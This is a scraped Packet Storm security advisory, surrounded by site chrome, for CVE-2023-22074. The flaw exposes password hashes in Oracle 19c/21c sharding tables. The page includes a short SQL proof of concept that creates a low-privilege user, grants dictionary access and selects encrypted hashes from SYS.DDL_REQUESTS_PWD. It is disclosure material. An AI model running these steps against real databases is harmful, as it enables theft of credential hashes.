WHAT ARE YOU LOOKING FOR?

Popular Tags

Oracle 19c / 21c Sharding Component Password Hash Exposure ≈ Packet Storm

Exploits Affichages : 209
Oracle 19c / 21c Sharding Component Password Hash Exposure ≈ Packet Storm

Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]

Oracle 19c / 21c Sharding Component Password Hash Exposure[6]
Authored by Emad Al-Mousa[7]

Oracle database versions 19.3 through 19.20 and 21.3 through 21.11 have an issue where an account with create session and select any dictionary can view password hashes stored in a system table that is part of a sharding component setup.

advisories | CVE-2023-22074[8]
SHA-256 | d2f153475e1ccb9fba7a3c56502ebe8182c7fe13f5f32cca180c60ebe9c205c7
Download[9] | Favorite[10] | View[11]

Change Mirror[12] Download[13]

        Title: CVE-2023-22074 – Oracle database password hash exposure in sharding component
Product:                   Database
Manufacturer:              Oracle
Affected Version(s):       19c,21c [19.3-19.20 and 21.3-21.11]
Tested Version(s):         19c
Risk Level:                Low
Solution Status:           Fixed
CVE Reference:             CVE-2023-22074
Base Score:              2.4 
Author of Advisory:        Emad Al-Mousa
*****************************************
Vulnerability Details:
Vulnerability in the Oracle Database Sharding component of Oracle Database Server. Attacker compromising an account with create session and select any dictionary can view password hashes stored in a system table that is part of sharding component setup.
*****************************************
Proof of Concept (PoC):
I will create an account called “jim” in pluggable database ORCLPDB1 and grant the account create session and select any dictionary privilege:
SQL> alter session set container=ORCLPDB1;
Session altered.
SQL> create user jim identified by jim123;
User created.
SQL> grant create session,select any dictionary to jim;
Grant succeeded.
I will now connect using database account “jim” and the account will be able to view the password hashes in system table DDL_REQUESTS_PWD used by database sharding component:
sqlplus "jim/jim123"@ORCLPDB1
SQL> show user
USER is "JIM"
SQL> select * from SYS.DDL_REQUESTS_PWD;
DDL_NUM  PWD_BEGIN
---------- ----------
ENC_PWD
--------------------------------------------------------------------------------
123        445
E494684108560FFEF1C17CDE72F36A1A
*****************************************
References:
https://www.oracle.com/security-alerts/cpuoct2023.html
https://nvd.nist.gov/vuln/detail/CVE-2023-22074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22074
https://databasesecurityninja.wordpress.com/2023/10/25/cve-2023-22074-oracle-database-password-hash-exposure-in-sharding-component/
https://github.com/emad-almousa/CVE-2023-22074

Login[14] or Register[15] to add favorites

File Archive:

October 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa

File Tags

File Archives

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month[110]
News Tags[111]
Files by Month[112]
File Tags[113]
File Directory[114]
About Us
History & Purpose[115]
Contact Information[116]
Terms of Service[117]
Privacy Statement[118]
Copyright Information[119]
Services
Security Services[120]
Hosting By
Rokasec[121]
close
Image
Back To Top

Pensée du jour :

Ce que l'homme a fait ,

l'homme peut le défaire.

 

"No secure path in the world"

Category

Popular Sections

About